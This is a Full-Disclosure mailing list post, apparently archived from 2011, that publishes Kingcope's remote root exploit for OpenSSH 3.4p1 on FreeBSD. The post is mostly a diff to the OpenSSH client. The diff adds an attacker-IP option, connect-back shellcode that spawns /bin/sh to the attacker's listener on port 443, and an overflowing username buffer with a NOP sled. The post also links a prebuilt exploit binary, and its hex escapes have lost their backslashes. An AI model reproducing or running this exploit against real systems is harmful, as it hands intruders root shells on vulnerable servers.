
OpenSSH 3.4p1 FreeBSD Remote Root Exploit

Posted on 01 July 2011

OpenSSH FreeBSD Remote Root Exploit By Kingcope Year 2011 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 run like ./ssh -1 -z <yourip> <target> setup a netcat, port 443 on yourip first a statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day I know these versions are really old, some seem to run that tough. -Cheers, King "the archaeologist" Cope
diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
149a150
> char *myip;
195a197,203
> "OpenSSH FreeBSD Remote Root Exploit "
> "By Kingcope "
> "Year 2011 "
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 "
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 "
> "run like ./ssh -1 -z <yourip> <target> "
> "setup a netcat, port 443 on yourip first "
299c307
< while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
---
> while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
335a344,346
> break;
> case 'z':
> myip = optarg;
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,719
> //IP=xc0xa8x20x80
> #define IPADDR "xc0xa8x20x80"
> #define PORT "x27x10" /* htons(10000) */
>
> char sc[] =
> "x90x90"
> "x90x90"
> "x31xc9" // xor ecx, ecx
> "xf7xe1" // mul ecx
> "x51" // push ecx
> "x41" // inc ecx
> "x51" // push ecx
> "x41" // inc ecx
> "x51" // push ecx
> "x51" // push ecx
> "xb0x61" // mov al, 97
> "xcdx80" // int 80h
> "x89xc3" // mov ebx, eax
> "x68"IPADDR // push dword 0101017fh
> "x66x68"PORT // push word 4135
> "x66x51" // push cx
> "x89xe6" // mov esi, esp
> "xb2x10" // mov dl, 16
> "x52" // push edx
> "x56" // push esi
> "x50" // push eax
> "x50" // push eax
> "xb0x62" // mov al, 98
> "xcdx80" // int 80h
> "x41" // inc ecx
> "xb0x5a" // mov al, 90
> "x49" // dec ecx
> "x51" // push ecx
> "x53" // push ebx
> "x53" // push ebx
> "xcdx80" // int 80h
> "x41" // inc ecx
> "xe2xf5" // loop -10
> "x51" // push ecx
> "x68x2fx2fx73x68" // push dword 68732f2fh
> "x68x2fx62x69x6e" // push dword 6e69622fh
> "x89xe3" // mov ebx, esp
> "x51" // push ecx
> "x54" // push esp
> "x53" // push ebx
> "x53" // push ebx
> "xb0xc4x34xff"
> "xcdx80"; // int 80h
>
>
> extern char *myip;
>
678a731,748
>
> char buffer[100000];
>
> printf("OpenSSH Remote Root Exploit ");
> printf("By Kingcope ");
> printf("Year 2011 ");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 ");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 ");
> printf("Connect back to: %s:443 ", myip);
>
> *((unsigned long*)(sc + 21)) = inet_addr(myip);
> *((unsigned short*)(sc + 27)) = htons(443);
>
> memset(buffer, 'V', 8096);
> memcpy(buffer+24, "x6bx4bx0cx08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
> memset(buffer+28, 'x90', 65535);
> memcpy(buffer+28+65535, sc, sizeof(sc));
> server_user=buffer;
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

 
